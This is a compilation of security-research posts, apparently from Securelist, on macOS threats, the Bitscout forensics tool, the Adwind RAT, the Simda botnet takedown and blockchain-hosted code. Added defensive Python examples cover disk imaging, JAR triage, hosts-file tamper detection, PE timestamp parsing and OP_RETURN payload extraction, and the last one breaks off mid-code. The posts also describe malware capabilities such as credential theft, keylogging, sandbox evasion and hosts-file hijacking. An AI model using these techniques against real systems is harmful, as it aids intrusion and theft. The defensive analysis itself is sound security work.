macOS malware has come a long way from the isolated instances of 2004 to the hundreds of thousands of samples that exist in 2019. However, the era of explosive growth seems to be behind us, and we cannot help noticing the decline in cybercriminal activity on this platform. The owners of MacBooks and iMacs have never been priority targets compared to Windows users: the latter have always been far more profitable to attack simply because they are far more numerous. In addition, there is a large number of both well-known and obscure exploits for Windows which, combined with the fact that Windows users tend to install updates irregularly, make Windows systems easier and cheaper for cybercriminals to infect.

Another important aspect that we have discovered while preparing this report is that instead of full-fledged malware, MacBook and iMac owners increasingly receive annoying, but in most cases relatively harmless ads. It seems that this way of monetizing an infection allows attackers to make a profit and save on expenses. By contrast, it would be much more complicated and expensive to create full-fledged malware for macOS. The reasons for this are both the fact that there are fewer potential victims and the efforts that Apple is making to protect its customers.

Phishing and social engineering, which are now also on the rise, are another example of cheaper threats. The attackers continue to mainly target Apple IDs, which are the users’ key to gaining access to Apple’s infrastructure. Apple IDs are relatively easy to monetize. For example, they can be sold to other criminals. Perhaps the theft of this type of data is now the most dangerous threat macOS users face, in terms of the balance between the probability of the attack and the damage in the event of its success. Moreover, our statistics show that this type of attack is likely to be on the rise in the near future.

An extremely dangerous (but also extremely rare) threat is a targeted attack on macOS and iOS users, mainly business users. Several well-known groups are currently developing malware for these operating systems, but the likelihood that a random user will be targeted by such programs is extremely small. However, if you work in a financial institution such as a bank and your MacBook or iPhone is a corporate device, then the chances that you will be targeted increase considerably. In that case the threat is significant enough that we do not recommend relying on Apple devices being less popular targets in general, and we recommend seeking out a reliable security solution. All the more so as we expect the number of targeted attacks on macOS and iOS devices to increase between 2019 and 2020.

To keep your macOS devices safe, Kaspersky recommends:

  • Keep macOS and all of your apps up to date.
  • Use only legitimate software, downloaded from official websites or installed from the Mac App Store.
  • Use a reliable security solution like Kaspersky Internet Security that delivers advanced protection on Mac, as well as on PC and mobile devices.
  • If you need to access your iCloud, for instance to find a lost phone, use only Apple’s official website.

To reduce the risk for corporate macOS users, Kaspersky recommends that companies take the following measures:

  • Implement security awareness training for staff explaining how to recognize and avoid potentially malicious applications or files. For example, employees should not download and launch any apps or programs from untrusted or unknown sources.
  • Use dedicated security products with protection for macOS and iOS included, such as Kaspersky Endpoint Security for Business, which uses cloud-based threat intelligence and machine learning techniques to detect existing and new threats across operating systems.
  • Provide your SOC team with access to the latest threat intelligence covering macOS threats, to keep up to date with the new and emerging tools, techniques and tactics used by threat actors.
Bitscout – The Free Remote Digital Forensics Tool Builder
https://securelist.com/bitscout-the-free-remote-digital-forensics-tool-builder/78991/
Thu, 06 Jul 2017 09:00:05 +0000

Being a malware researcher means you are always busy with the struggle against mountains of malware and cyberattacks around the world. Over the past decade, the number of new malware findings per day has risen to unimaginable heights: hundreds of thousands of samples every day! However, while some malware is rare and dangerous, not every sample is that malicious. Moreover, some of the biggest threats exist only when several ingredients are put together: multiple malware tools, malicious infrastructure, and interactive commands coming from their operators.

This is why, instead of only looking at malware, we have started tracking groups of attackers and have focused on campaigns and isolated incidents. This has been an increasingly challenging job, because it involves searching for a needle in a haystack of haystacks, sometimes across very distant locations. There are different ways of conducting searches like this, but the most reliable is the one used by law enforcement agencies: full digital forensics. This procedure is time consuming, highly dependent on the availability of a skilled expert on site, and usually involves physical travel. Our natural response to this problem was to look for a solution, and surprisingly nobody was offering one. Well, at least not one that was up to our standards!

My Bitscout project started years ago as a hobby. I had been playing with the creation and customisation of LiveCDs. Some time afterwards, when we needed to find traces of a certain attacker on a compromised PC in an African country, I thought I could help. I built a simple and minimal Linux LiveCD with a preconfigured VPN client and SSH server, and shared it with the system owner over the Internet. The owner burnt the CD and started the infected PC from it. It worked like a charm: full control over the remote computer, connected via the Internet, became available from my desk. It was a slow connection, but luckily I didn’t need bandwidth-heavy remote desktop access: a text terminal was more than enough to do the job over a slow modem line. I managed to help the owner acquire a forensically sound disk image of the compromised system, point out the malware and related file locations and, most importantly, extract precious pieces of information, including a malware dropper and a spearphishing email.
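The core of that remote session was a forensically sound acquisition: read the disk once, block by block, write an image, and hash it so the copy can be proven identical later. The Python below is an added example for this page illustrating that procedure; it is not Bitscout’s own scripts, which drive standard Linux tools. The source it images is a constructed in-memory “disk” with one unreadable sector, so the zero-fill-and-continue behaviour of dd conv=noerror,sync is actually exercised; on a real system src would be a read-only handle to the block device.

```python
import hashlib
import io
import os
import tempfile

SECTOR = 512  # read granularity; matches the classic dd bs=512


def sha256_file(path, chunk_size=1 << 20):
    """Hash a file on disk; used to verify the written image independently
    of the hash computed while streaming."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def acquire_image(src, dst_path, block_size=SECTOR):
    """Stream `src` (an opened, read-only, seekable device or file) into dst_path.

    A block whose read raises OSError is replaced by zeros and its offset
    recorded, the equivalent of dd conv=noerror,sync, so offsets in the image
    still line up with the source. Returns the acquisition record that belongs
    in the case notes: byte count, SHA-256 of the image, unreadable offsets."""
    digest = hashlib.sha256()
    bad_blocks = []
    offset = 0
    with open(dst_path, "wb") as dst:
        while True:
            try:
                chunk = src.read(block_size)
            except OSError:
                bad_blocks.append(offset)
                chunk = b"\x00" * block_size
                src.seek(offset + block_size)  # skip past the unreadable block
            if not chunk:
                break
            dst.write(chunk)
            digest.update(chunk)
            offset += len(chunk)
    return {"bytes": offset, "sha256": digest.hexdigest(), "bad_blocks": bad_blocks}


def verify_image(dst_path, record):
    """Re-read the image from disk and confirm size and hash match what was streamed."""
    return (os.path.getsize(dst_path) == record["bytes"]
            and sha256_file(dst_path) == record["sha256"])


class FlakySource:
    """Constructed stand-in for a device with bad sectors: a read that starts at
    any offset in bad_offsets fails with EIO, like a failing drive would."""

    def __init__(self, data, bad_offsets):
        self._buf = io.BytesIO(data)
        self._bad = set(bad_offsets)

    def read(self, n):
        if self._buf.tell() in self._bad:
            raise OSError(5, "Input/output error")
        return self._buf.read(n)

    def seek(self, pos):
        return self._buf.seek(pos)


def demo():
    data = bytes(range(256)) * 16  # constructed 4 KiB "disk" of 8 sectors
    bad = SECTOR * 3               # sector 3 is unreadable
    with tempfile.TemporaryDirectory() as tmp:
        img = os.path.join(tmp, "evidence.img")
        record = acquire_image(FlakySource(data, {bad}), img)
        verified = verify_image(img, record)
        with open(img, "rb") as f:
            image = f.read()
    expected = data[:bad] + b"\x00" * SECTOR + data[bad + SECTOR:]
    return {"record": record, "verified": verified, "layout_preserved": image == expected}


if __name__ == "__main__":
    print(demo())
```

A bad block cannot be hashed, so the recorded hash is that of the image as acquired and the bad-block list documents the gap; verify_image re-reads the written file so that a write error on the destination cannot go unnoticed. On the remote machine the source must be opened read-only (and, where possible, behind a write blocker) so that the acquisition itself does not alter the evidence.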

Time passed, and similar requests appeared again and again. We worked with INTERPOL using the same model: a law enforcement officer would go to the physical disk acquisition location, and with permission from local law enforcement agencies, would let us find the most important evidence on the site – instantly. This cut our time traveling and helped law enforcement with the quick discovery of key artefacts left after a cyberattack.

Bitscout booting process

Some time afterwards many new scenarios started popping up:

  1. Manually remediating an infected PC (removing a rootkit)
  2. Sharing remote sessions, which lets us train new users and speeds up analysis
  3. Once, I traveled to a customer without an expensive enterprise SAS disk controller to complete a disk image acquisition. Using the LiveCD I was able to clone the disk via the original server hardware, and I didn’t even have to stay in the cold server room to monitor the progress!

We also worked on making the tool simple and friendly for users who are not familiar with command-line Linux environments. Still, to keep the disk size small, we decided to stay away from GUI tools and X11 servers. Naturally we settled on a TUI (text UI), which is simple to operate with just the arrow keys.

Bitscout 2.0 main window for general users

However, when you work with someone who has never met you, trust is an inherent problem. Just think about it: would you let some remote expert have access to your precious system? If so, I’d be delighted to work with you. But if I were in your shoes, I would be paranoid, and would like to control the process myself. This is quite natural and is something that bothered me in the previous versions of LiveCDs.

This issue of trust could be resolved if we could somehow limit the expert’s access to hardware, and monitor and record everything he or she does. Following this idea, we built a new version of Bitscout: Bitscout 2.0, which we have just released. The remote expert has root privileges only inside an unprivileged container. The expert can access only those disk devices that the owner permits, and can install additional software and change system files, all without the risk of compromising the host system or the data on the hard drive. This all happens in RAM and is gone once the system is shut down. In addition, all remote sessions are recorded and stored outside of the container. This provides a good level of isolation and a way to reconstruct the forensic process for learning purposes, or to prove the existence of evidence.

But that’s not all! Bitscout 2.0 is not only based on open-source tools, it is an open-source tool itself that lets you build your own LiveCDs: your own types of Bitscout systems. So, the tool is essentially a collection of scripts which anyone can validate, customize and improve.

And you are welcome to do so, because now it’s on Github: https://github.com/vitaly-kamluk/bitscout

Adwind: FAQ
https://securelist.com/adwind-faq/73660/
Mon, 08 Feb 2016 15:38:00 +0000

Download full report PDF

We have become aware of unusual malware that was found in some banks in Singapore. This malware has many names – it is known as Adwind RAT (Remote Access Tool), AlienSpy, Frutas, Unrecom, Sockrat, JSocket, and jRat. It is a backdoor available for purchase, and is written entirely in Java which makes it cross-platform. According to the author, the backdoor component (called the server) can run on Windows, Mac OS, Linux and Android platforms providing rich capabilities for remote control, data gathering, data exfiltration and lateral movement.

While it is mostly used by opportunistic attackers and distributed in massive spam campaigns, there are indications that some Adwind samples were used in targeted attacks. In August 2015, AlienSpy popped up in the news in connection with cyber-espionage against an Argentinian prosecutor who was found dead in January 2015.


The malware sample we received was sent by email to some banks in Singapore on behalf of a major Malaysian bank. The IP address of the e-mail senders points to a server in Romania while the mail server and account used belong to a company located in Russia.

Adwind is a backdoor written purely in Java that targets systems supporting the Java runtime environment. The malware operates by sending out system information and accepting commands from a remote attacker. These commands can be used, among other things, to display messages on the system, open URLs, update the malware, download and execute files, and download and load plugins. A significant amount of additional functionality is provided through downloadable plugins, including remote control options and shell command execution.

We encourage enterprises to review whether they need the Java platform at all and to disable it for all unauthorized sources.

Adwind timeline

What exactly is Adwind?

Adwind is a cross-platform, multifunctional backdoor, which can run on Windows, Mac OS, Linux and Android OS.

Is this a nation-state sponsored campaign?

This is not a nation-state sponsored campaign. We believe that it was developed and used mostly by cybercriminals.

Who are the victims? / What can you say about the targets of the attacks?

The victims range from random people that launched the malware following an opportunistic attack to specific organizations, most of which are small and medium-sized businesses.

How did you become aware of this threat? Who reported it?

From one of our partners we received part of an email with a .JAR attachment. The profile of the partner company and the contents of the email indicated a targeted attack attempt. While the partner was not compromised we decided to check the attachment, which led us to the malware platform.

How does Adwind infect computers?

Adwind does not infect computers on its own or spread automatically. It relies on user interaction: double-clicking the .JAR attachment in the email, or the same file extracted from an archive. Alternatively, it can be spread via other containers such as .hta or .vbs files, which install Java if it is not available on the system and download the main Adwind .JAR file from a remote server.
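Since infection hinges on the user opening a .JAR (or a script that fetches one), a mail gateway or an analyst can triage attachments by content rather than by the name the sender chose. The Python below is an added example for this page, not Kaspersky’s detection logic or an Adwind sample: it builds a constructed JAR with a manifest, one real class, one file that is merely named .class, and one opaque resource, then reports the entry point and flags a JAR hiding behind a document-looking name or a double extension.

```python
import io
import os
import zipfile

JAVA_CLASS_MAGIC = b"\xca\xfe\xba\xbe"
# Extensions the FAQ names as Adwind carriers apart from the .jar itself.
SCRIPT_CARRIERS = {".hta", ".vbs"}
DOCUMENT_LOOKALIKES = {".pdf", ".doc", ".docx", ".xls", ".xlsx"}


def parse_manifest(text):
    """Parse the main section of META-INF/MANIFEST.MF into a dict. A line that
    starts with a space continues the previous value (the JAR spec's line wrap);
    the first blank line ends the main section."""
    attrs, last = {}, None
    for line in text.splitlines():
        if not line.strip():
            break
        if line.startswith(" ") and last is not None:
            attrs[last] += line[1:]
        elif ":" in line:
            key, _, value = line.partition(":")
            last = key.strip()
            attrs[last] = value.strip()
    return attrs


def inspect_jar(data):
    """Describe a Java archive: entry point, number of entries that really are
    class files (checked by magic, not by name) and the opaque resources that
    could hold a second stage or configuration."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        manifest = {}
        if "META-INF/MANIFEST.MF" in names:
            manifest = parse_manifest(zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace"))
        class_entries = [n for n in names if n.endswith(".class")]
        real_classes = sum(1 for n in class_entries if zf.read(n)[:4] == JAVA_CLASS_MAGIC)
        resources = [n for n in names
                     if not n.endswith("/") and not n.endswith(".class")
                     and not n.startswith("META-INF/")]
    return {
        "is_jar": bool(manifest) or bool(class_entries),
        "main_class": manifest.get("Main-Class"),
        "class_count": real_classes,
        "resources": resources,
    }


def triage_attachment(filename, data):
    """Findings for one attachment: content first, displayed name second."""
    findings = []
    lower = filename.lower()
    ext = os.path.splitext(lower)[1]
    inner_ext = os.path.splitext(lower[:-len(ext)] if ext else lower)[1]
    if ext in SCRIPT_CARRIERS:
        findings.append(f"{ext} script attachment: can install Java and fetch a JAR")
    if zipfile.is_zipfile(io.BytesIO(data)):
        info = inspect_jar(data)
        if info["is_jar"]:
            findings.append(f"Java archive: Main-Class={info['main_class']}, "
                            f"{info['class_count']} class files, "
                            f"{len(info['resources'])} other resources")
            if ext != ".jar":
                findings.append(f"JAR content behind a '{ext or 'missing'}' extension")
            if inner_ext in DOCUMENT_LOOKALIKES:
                findings.append("double extension: document-looking name on an executable archive")
    return findings


def build_sample_jar():
    """Constructed JAR standing in for a RAT dropper (not an Adwind sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    "Manifest-Version: 1.0\r\nMain-Class: com.example.loader.Main\r\n"
                    "Created-By: constructed\r\n\r\n")
        zf.writestr("com/example/loader/Main.class",
                    JAVA_CLASS_MAGIC + b"\x00\x00\x00\x34" + b"\x00" * 32)
        zf.writestr("com/example/loader/Decoy.class", b"not really a class file")
        zf.writestr("resources/config.dat", bytes(range(256)))
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_jar()
    for name in ("Payment_Advice.pdf.jar", "Payment_Advice.PDF", "Payment_Advice.pdf"):
        print(name, triage_attachment(name, sample))
```

Content beats name: a JAR is a ZIP with a META-INF/MANIFEST.MF, and the Main-Class attribute is what java -jar launches, so it is also the first class to decompile. Opaque resources sitting next to a tiny set of classes are where a loader would keep a second stage or its configuration, which is why the example lists them rather than just counting classes.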

Are the attackers using any zero-day vulnerabilities?

We have not seen attackers using zero-day vulnerabilities together with Adwind.

What exactly is being stolen from the target machines?

Limited only by the intelligence needs of the attackers, the malware can:

  • collect keystrokes
  • steal cached passwords and grab data from web forms
  • take screenshots
  • take pictures and record video from the webcam
  • record sound from the microphone
  • transfer files
  • collect general system and user information
  • steal keys for cryptocurrency wallets
  • manage SMS (for Android)
  • steal VPN certificates

Is this a Windows-only threat? Which versions of Windows are targeted? Are there Mac OS X or Linux variants?

This malware is capable of running on any platform that has a modern Java runtime environment installed, which includes all Java-supported versions of Windows, Mac OS X, Linux and potentially other platforms which run Java.

Have you seen any evidence of a mobile component – iOS, Android or BlackBerry?

We have seen Adwind .apk files that can run on Android OS, however iOS and BlackBerry are out of the scope of this platform.

It seems Adwind is all about Java. Why do you think it is so?

Java applications by design should be platform independent. While certain system architectures are quite specific and there is a set of Java libraries designed for them, general purpose code may run on any system that has a Java runtime environment installed. This makes Java a very convenient platform for which to develop malware that can run on any platform.

Do you know the total number of victims?

Our own estimate of the number of targets attacked by this malware is more than 443,000 over the period from 2013 to the beginning of 2016.

What is the geography of victims?

The geography of victims changed over time. In 2013, Arabic- and Spanish-speaking countries were the top targets. In 2014, the most attacked countries were Turkey and India, followed by the UAE, the US and Vietnam. In 2015, Russia was the most attacked country, with the UAE and Turkey again near the top, along with the USA and Germany.

What are the attacked industries?

During their investigation the Kaspersky Lab researchers were able to analyze nearly 200 examples of spear-phishing attacks organized by unknown criminals to spread the Adwind malware, and were able to identify the industries most of the targets worked in:

  • Manufacturing
  • Finance
  • Engineering
  • Design
  • Retail
  • Government
  • Shipping
  • Telecom
  • Software
  • Education
  • Food production
  • Healthcare
  • Media
  • Energy

Map of Adwind attacks

Based on information from Kaspersky Security Network, the 200 examples of spear-phishing attacks observed in the six months between August 2015 and January 2016 resulted in Adwind RAT malware samples being encountered by more than 68,000 users.

Who are the clients of Adwind? Where are they from? How many? Are they APT actors?

To begin with, Adwind only had a Spanish interface; it now also has an English interface and is used by cybercriminals from many countries. We believe the clients of the Adwind platform fall into the following categories:

  1. Scammers that want to move to the next level (using malware for more advanced fraud)
  2. Unfair competitors
  3. Cyber-mercenaries (spies for hire)
  4. Private individuals that want to spy on people they know

How is this different from any other APT attack?

Adwind is not an APT attack. It is a platform with rich capabilities that cybercriminals can use to conduct cyber-espionage.

Are there multiple variants of Adwind? Are there any major differences in the variants?

There have been multiple generations of Adwind, which has been continuously developed and supported since at least 2012. The differences are mostly in malware features and available modules; all variants rely on the same basic client-server communication scheme. It is designed to send commands in an ad-hoc manner, which makes it impractical to control a large number of compromised machines. We believe it is not suitable even for medium-sized botnets and is used only for targeted network penetrations.

Are the command-and-control servers used by Adwind still active? Have you been able to sinkhole any of the C&Cs?

The Adwind malware is used by hundreds of criminals, which means that there are hundreds of command and control servers. Some of them are down, some are up, the others are turned on as required. It’s not easy and not efficient to take them down in the traditional way. Most of them rely on free Dynamic DNS providers and are not real domain registrations.

Who is responsible for this threat?

We cannot speculate publicly about attribution.

How long have the attackers been active?

The users of Adwind malware have been active since at least 2012 with a large spike of users at the end of 2015.

Did the attackers use any interesting/advanced technologies?

Generally speaking, the Java platform is not a common platform for malware at all. It is mainly related to the requirement of having a Java runtime environment on the victim’s system, the size of the generated code and availability of decompilers for Java classes. The author of the Adwind malware attempted to solve all these problems by introducing a number of workarounds.

Does Kaspersky Lab detect all variants of this malware?

Kaspersky Lab products detect all variants of this malware that we know about. The full list is available in the Appendix of our public report.

Are there Indicators of Compromise (IOCs) to help victims identify the intrusion?

Yes, there are many known domains and IP addresses used by the Adwind attackers. The full list is available in the Appendix of our public report.

What is JSocket? How long has it existed?

JSocket is the latest reincarnation of Adwind RAT, and available through online subscription. It was launched in June 2015 and is still running.

What is the problem with just interrupting the JSocket service?

Interrupting the service by suspending the domain or taking down the server wasn’t efficient in the past and led to yet another rebranding and restart of the platform.

What is the difference between JSocket and Adwind?

The Adwind RAT and the JSocket RAT are based on the same source code and were most likely developed by the same author. While Adwind was abandoned some time ago, JSocket still exists and is just another “brand” of the same RAT. As JSocket is the latest variant of the backdoor it has many more features and a rebuilt UI.

How many people do you think are behind the whole MaaS platform?

We believe that the platform is in the hands of just one hardworking individual, who sometimes outsources tasks to external developers.

You estimated the revenue of the whole service as 200k per year. How did you calculate this figure?

Based on users’ activity on the internal message board and some other observations, we estimated a number of users in the system as 1,800 by the end of 2015. By making certain assumptions on the percentage of paid accounts, service costs and most probable distribution of the paid customers, we concluded that such a service may generate up to $200K USD annually. However, this is just an estimation of revenue, which doesn’t necessarily mean that the author has already received this money. One important fact is that the latest version of the portal was launched only in summer 2015.

Have you reported your findings to LEA? What was the outcome?

We believe that reporting to Law Enforcement is the best way to combat cybercrime. Yes, we have reported the case of the attempted computer attack which we investigated in depth from the very beginning, based on information provided by our research partner. The information was received but apparently it takes time to verify and process such reports to start an investigation. The reporter doesn’t normally get an update from a police investigation, with the exception of requests for some additional information.

To find out more about withstanding Adwind-based attacks, read this article in the Kaspersky Business Blog.

For any inquiries, please contact intelreports@kaspersky.com

Simda’s Hide and Seek: Grown-up Games (https://securelist.com/simdas-hide-and-seek-grown-up-games/69580/, Mon, 13 Apr 2015 04:30:04 +0000)

On 9 April, 2015 Kaspersky Lab was involved in the synchronized Simda botnet takedown operation coordinated by INTERPOL Global Complex for Innovation. In this case the investigation was initially started by Microsoft and expanded to involve a larger circle of participants including TrendMicro, the Cyber Defense Institute, officers from the Dutch National High Tech Crime Unit (NHTCU), the FBI, the Police Grand-Ducale Section Nouvelles Technologies in Luxembourg, and the Russian Ministry of the Interior’s Cybercrime Department “K” supported by the INTERPOL National Central Bureau in Moscow.

As a result of this takedown 14 C&C servers were seized in the Netherlands, USA, Luxembourg, Poland and Russia. Preliminary analysis of some of the sinkholed server logs revealed a list of 190 countries affected by the Simda botnet.

[Image: Simba character, courtesy of Walt Disney Productions, has nothing to do with the Simda botnet]

Simda is a mysterious botnet used for cybercriminal purposes, such as the dissemination of potentially unwanted and malicious software. This bot is mysterious because it rarely appears on our KSN radars despite compromising a large number of hosts every day. This is partly due to its detection of emulation, security tools and virtual machines. It has a number of methods to detect research sandbox environments, with a view to tricking researchers by consuming all CPU resources or notifying the botnet owner about the external IP address of the research network. Other reasons are server-side polymorphism and the limited lifetime of the bots.

Simda is distributed by a number of infected websites that redirect to exploit kits. The bot uses hardcoded IP addresses to notify the master about various stages of the execution process. It downloads and runs additional components from its own update servers and can modify the system hosts file. The latter is quite an interesting technique, even if it seems deceptively obvious at first glance.

Normally malware authors modify hosts files to tamper with search engine results or to denylist certain security software websites, but the Simda bot adds unexpected records for google-analytics.com and connect.facebook.net that point to malicious IPs.


Why is that, one might ask? We don’t know, but we believe that the answer is connected with Simda’s core purpose: the distribution of other malware. This criminal business model opens up the possibility of exclusive malware distribution, meaning that the distributors can guarantee that only the client’s malware is installed on infected machines. That becomes the case when Simda interprets a particular response from the C&C server: it can deactivate itself by preventing the bot from starting after the next reboot and instantly exiting. This deactivation coincides with the modification of the system hosts file. As a farewell touch, Simda replaces the original hosts file with a new one from its own body.

Now, a curious mind may ask: how does this help them? Those domains are no longer used to generate search results, but machines infected by Simda in the past might occasionally continue to send out HTTP requests to the malicious servers, even when exclusive third-party malware is supposed to have been installed.

We need to remember that these machines were initially infected by an exploit kit using a vulnerability in unpatched software. It’s highly likely that 3rd-party malware will be removed over time, but a careless user may never get round to updating vulnerable software.

If all those hosts keep coming back to the malicious servers and asking for web resources such as javascript files, the criminals could use the same exploits to re-infect the machines and sell them all over again – perhaps even ‘exclusively’ to the original client. This confirms once again – even criminals can’t trust criminals.
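The hosts-file tampering described above is easy to check for on a host. The Python below is an added example, not Simda analysis code or Kaspersky Lab tooling: it parses a hosts file, ignores loopback and unspecified entries (the only targets a benign hosts file normally has) and reports watched domains, or their subdomains, that are mapped to some other address. The sample hosts file and the 203.0.113.0/24 addresses are constructed for the example; the watched-domain list is an assumption seeded from the two domains named in the post.

```python
# Added example (not Simda or Kaspersky Lab code): flag hosts-file entries that
# redirect well-known domains to non-local addresses, the indicator described above.
import ipaddress

# Domains the post names as targets of Simda's hosts-file tampering; extend as needed.
WATCHED_DOMAINS = {"google-analytics.com", "connect.facebook.net"}

# Constructed sample hosts file. 203.0.113.0/24 is a documentation range, not a real C&C.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
127.0.0.1       update.example-av.test      # typical denylisting of a security vendor
203.0.113.10    google-analytics.com
203.0.113.10    connect.facebook.net  www.google-analytics.com
"""


def parse_hosts(text):
    """Yield (ip, hostname) pairs from hosts-file text, skipping comments and blank lines.
    One line may map several names to the same address, so each name is yielded separately."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        ip, names = parts[0], parts[1:]
        for name in names:
            yield ip, name.lower()


def is_local(ip):
    """True for loopback or unspecified addresses, the expected targets in a clean hosts file.
    Unparsable addresses are treated as non-local so they are not silently skipped."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return addr.is_loopback or addr.is_unspecified


def suspicious_hosts_entries(text, watched=WATCHED_DOMAINS):
    """Return [(hostname, ip)] for watched domains (or their subdomains) that are
    mapped to a non-local address. A clean hosts file yields an empty list."""
    hits = []
    for ip, name in parse_hosts(text):
        if is_local(ip):
            continue
        if any(name == d or name.endswith("." + d) for d in watched):
            hits.append((name, ip))
    return hits


if __name__ == "__main__":
    for name, ip in suspicious_hosts_entries(SAMPLE_HOSTS):
        print(f"hosts file redirects {name} -> {ip}")
```

On a real Windows system the text would come from `C:\Windows\System32\drivers\etc\hosts`; the check is deliberately allow-list based (anything non-local for a watched name is reported) because the attacker's IP is not known in advance.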

In this investigation Microsoft and various law enforcement bodies completed the sinkholing process and Kaspersky Lab willingly contributed to the preparations for the takedown. That work included technical analysis of malware, collecting infection statistics, advising on botnet takedown strategy and consulting our INTERPOL partners.

Kaspersky Lab detected the Simda bot as Backdoor.Win32.Simda and, according to our estimations based on KSN statistics and telemetry from our partners, it affected hundreds of thousands of victims worldwide.


Simda is automatically generated on demand and this is confirmed by the absence of any order in compilation link times. Below is a chart generated from a small subset of about 70 random Simda samples:

[Chart: sample link times in the UTC timezone]

The increase in link times at certain hours is most likely related to the activity of the majority of Simda victims, located somewhere between the UTC-9 and UTC-5 timezones, which include the United States.
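The link-time chart above comes from the COFF header timestamp of each sample. As an added example (not Simda analysis code or Kaspersky Lab tooling), the Python below reads that timestamp from PE bytes, buckets a batch of samples by UTC hour and checks whether a sample set ordered by first-seen date is chronological, which is the "absence of any order" observation made above. The `stub_pe()` inputs are constructed header-only stand-ins for samples, not real binaries, and the batch of link times is invented.

```python
# Added example (not Simda or Kaspersky Lab code): read PE link timestamps and
# bucket them by UTC hour, the analysis behind the chart described above.
import struct
from collections import Counter
from datetime import datetime, timezone


def link_time_utc(pe_bytes):
    """Return the COFF header TimeDateStamp as an aware UTC datetime.
    Layout: e_lfanew at offset 0x3c points at the 'PE\\0\\0' signature; the 20-byte
    COFF header follows it, with TimeDateStamp as its third field at +8."""
    if pe_bytes[:2] != b"MZ":
        raise ValueError("not an MZ/PE file")
    (e_lfanew,) = struct.unpack_from("<I", pe_bytes, 0x3C)
    if pe_bytes[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    (stamp,) = struct.unpack_from("<I", pe_bytes, e_lfanew + 8)
    return datetime.fromtimestamp(stamp, tz=timezone.utc)


def hour_histogram(samples):
    """Count samples per UTC hour of link time; the peaks show when the build
    service was busiest, i.e. when its victims were awake."""
    return Counter(link_time_utc(s).hour for s in samples)


def is_chronological(samples):
    """True when link times never decrease in the given order (for example, samples
    sorted by the date they were first seen). Samples generated on demand, as the
    post describes, come out False on a real sample set."""
    stamps = [link_time_utc(s) for s in samples]
    return all(a <= b for a, b in zip(stamps, stamps[1:]))


def stub_pe(stamp):
    """Constructed stand-in for a sample: only the header bytes a timestamp scan reads
    (DOS header, PE signature, COFF header with machine=i386 and one section).
    It is not a runnable executable."""
    buf = bytearray(0x40 + 4 + 20)
    buf[:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)            # e_lfanew -> PE signature
    buf[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HHI", buf, 0x44, 0x14C, 1, stamp)  # Machine, NumberOfSections, TimeDateStamp
    return bytes(buf)


# Constructed batch: 1420070400 is 2015-01-01 00:00:00 UTC; offsets are whole hours.
BASE_STAMP = 1420070400
SAMPLE_SET = [stub_pe(BASE_STAMP + 3600 * h) for h in (15, 15, 16, 15, 3, 22, 16)]

if __name__ == "__main__":
    hist = hour_histogram(SAMPLE_SET)
    for hour in range(24):
        print(f"{hour:02d}:00 UTC {'#' * hist[hour]}")
    print("chronological in first-seen order:", is_chronological(SAMPLE_SET))
```

The parser deliberately trusts nothing beyond the two signatures; a timestamp scan over a large malware corpus should still be wrapped in error handling, because corrupted or deliberately malformed headers are common.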

Thanks to the sinkhole operation and data sharing between partners we have put up a page where you can check if your IP has connected to Simda C&C servers in the past. If you suspect your computer was compromised you can use one of our free or trial solutions to scan your whole hard drive or install Kaspersky Internet Security for long-term protection.

Kaspersky Lab products currently detect hundreds of thousands of modifications of Simda, together with many different third-party malware families distributed during the Simda campaign.


Blockchain technology abuse: time to think about fixes (https://securelist.com/blockchain-technology-abuse-time-to-think-about-fixes/69488/, Tue, 07 Apr 2015 10:57:03 +0000)

Kaspersky Lab and INTERPOL recently presented research on how blockchain-based cryptocurrencies could be abused through the pollution of public decentralized databases with arbitrary data.  During our presentation at the BlackHat Asia conference in Singapore, we demonstrated the proof-of-concept using the Bitcoin network, but it’s important to understand that any cryptocurrency that relies on blockchain technology can be abused in this way.


Some believe that security researchers, especially those from the anti-malware industry, generally only publish threat reports after the discovery of a threat in the wild.  However, this is not always true.  Our current research focuses on potential future threats that could be prevented before cryptocurrencies are fully adopted and standardized. While we generally support the idea of blockchain-based innovations, we think that, as part of the security community, it is our duty to help developers make such technologies fit-for-purpose and sustainable.

Blockchainware, short for blockchain-based software, stores some of its executable code in the decentralized databases of cryptocurrency transactions. It is based on the idea of establishing a connection to the P2P networks of cryptocurrency enthusiasts, fetching information from transaction records and running it as code. Depending on the payload fetched from the network, it can be either benign or malicious.
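A defender who wants to measure how much non-financial data a chain carries needs to recognise data-carrier outputs and triage what they hold. The Python below is an added example and not the proof of concept the post describes: it parses Bitcoin output scripts, extracts the bytes pushed after OP_RETURN (Bitcoin's standard data-carrier opcode; assuming that embedding method is my choice, since the post does not say which one the demonstration used) and classifies the payload. The three sample scripts are constructed, not taken from real transactions.

```python
# Added example (not the Kaspersky Lab / INTERPOL proof of concept): extract and
# classify payloads from OP_RETURN data-carrier outputs for blockchain monitoring.
OP_RETURN = 0x6A
OP_PUSHDATA1, OP_PUSHDATA2, OP_PUSHDATA4 = 0x4C, 0x4D, 0x4E


def data_carrier_payload(script):
    """Return the bytes pushed after OP_RETURN, or None if the script is not a
    pure data-carrier output (e.g. a normal pay-to-pubkey-hash script).
    Raises ValueError on a push that runs past the end of the script."""
    if not script or script[0] != OP_RETURN:
        return None
    pos = 1

    def take(k):
        nonlocal pos
        if pos + k > len(script):
            raise ValueError("truncated push in script")
        chunk = script[pos:pos + k]
        pos += k
        return chunk

    out = bytearray()
    while pos < len(script):
        op = take(1)[0]
        if 1 <= op <= 0x4B:                      # direct push of 1..75 bytes
            n = op
        elif op == OP_PUSHDATA1:                 # next 1 byte is the length
            n = take(1)[0]
        elif op == OP_PUSHDATA2:                 # next 2 bytes (LE) are the length
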